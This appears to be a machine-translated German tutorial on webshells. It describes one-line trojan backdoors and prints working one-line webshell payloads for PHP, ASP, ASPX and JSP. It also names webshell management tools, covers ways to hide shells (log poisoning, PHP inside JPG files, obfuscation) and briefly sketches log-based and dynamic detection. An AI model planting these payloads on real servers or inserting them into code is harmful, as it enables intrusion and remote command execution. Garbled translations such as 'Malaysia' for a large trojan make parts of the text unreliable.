einführen:
Webshell erhält bestimmte Berechtigungen des Servers über die vom Server geöffneten Ports.
Webshell wird auch als Skript-Trojaner bezeichnet, der im Allgemeinen in große Pferde, kleine Pferde und Ein-Satz-Trojaner unterteilt wird.
Malaysia ist groß und voll funktionsfähig. Es kann Datenbanken und Dateien verwalten, schnell Informationen über die Website sammeln und sogar Berechtigungen erweitern.
Wenn wir in Xiaoma eine Datei hochladen, ist die Größe der hochgeladenen Datei begrenzt oder die Datei wird abgefangen. Daher verwende ich Xiaoma, um Dama hochzuladen und die gewünschten Funktionen zu erreichen.
Ein Ein-Satz-Trojaner, kurz und prägnant, leistungsstark, gut versteckt und kann Webshells mithilfe des Clients schnell verwalten.
Prinzip:
Mithilfe von Datei-Upload-Schwachstellen, SQL-Injection-Schwachstellen, RCE-Schwachstellen usw. werden schädliche Dateien auf dem Webserver abgelegt, der oft als „Hintertür“ bezeichnet wird. Anschließend werden böswillige Vorgänge wie Dateiverwaltung, Datenbankverwaltung, Remote-Befehlsausführung usw. ausgeführt Es kann eine Privilegieneskalation durchgeführt werden.
Häufige Satztrojaner:
php
<?php @eval($_POST[value]); ?><?php assert($_POST[value]);?><?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>asp
<%eval request ("value")%><% execute(request("value")) %>aspx
<%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>jsp
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>WebShell-Verwaltungstools
Cknife Chinesisches Küchenmesser
Ameisenschwert Chinesisches Ameisenschwert
Der dynamische Website-Verwaltungsclient für binäre Verschlüsselung von Ice Scorpion
weevely3 Bewaffnete Web-Shell
Altman, das plattformübergreifende Webshell-Tool in .NET
Webshell Sniper Verwalten Sie Ihre Website über das Terminal
Quasibot komplexer Webshell-Manager, Quasi-http-Botnetz
webshellhide
Zum Loggen ausblenden
Ändern Sie beispielsweise den Header des gesendeten Datenpakets und fügen Sie eine Webshell hinzu. Der Webserver speichert im Allgemeinen Zugriffsdatensätze in Webprotokollen. Wenn das Webprotokoll gefunden und im ausführbaren Verzeichnis abgelegt wird, kann eine Shell abgerufen werden.
Verstecken Sie sich vor legitimen Dateien
Wenn Sie beispielsweise bei der Datei-Upload-Schwachstelle den PHP-Code in eine JPG-Datei einfügen, können Sie den @-Operator verwenden, um Fehler zu verhindern.
Verwechseln
Löschen Sie Leerzeichen, Zeilenumbrüche usw., was zu unordentlichen Codedateien führt, und verwenden Sie Codierung oder Verschlüsselung, um schädliche Funktionsnamen usw. zu verbergen.
Statische Erkennung
Weblog
Führen Sie nach der Vorverarbeitung der Protokolldateien einen Textmerkmalsabgleich, eine statistische Merkmalsberechnung und eine Dateikorrelationsanalyse für die Protokolldatensätze durch. Abschließend werden die Erkennungsergebnisse zusammengefasst und die verdächtigen Webshell-Dateien aufgelistet.
Beispielsweise hat eine bestimmte PHP-Datei im Website-Verzeichnis zu wenige Besuche und die Quell-IP ist festgelegt.
Dynamische Erkennung
Sobald die Webshell an den Server übertragen wurde, müssen Hacker sie ausführen. Die beim Ausführen der Webshell angezeigten Merkmale werden als dynamische Merkmale bezeichnet.
Wenn Webshell beispielsweise Systembefehle ausführt, gibt es einen Prozess.
Der Antiviren-Inhalt von Webshell wird in Zukunft aktualisiert!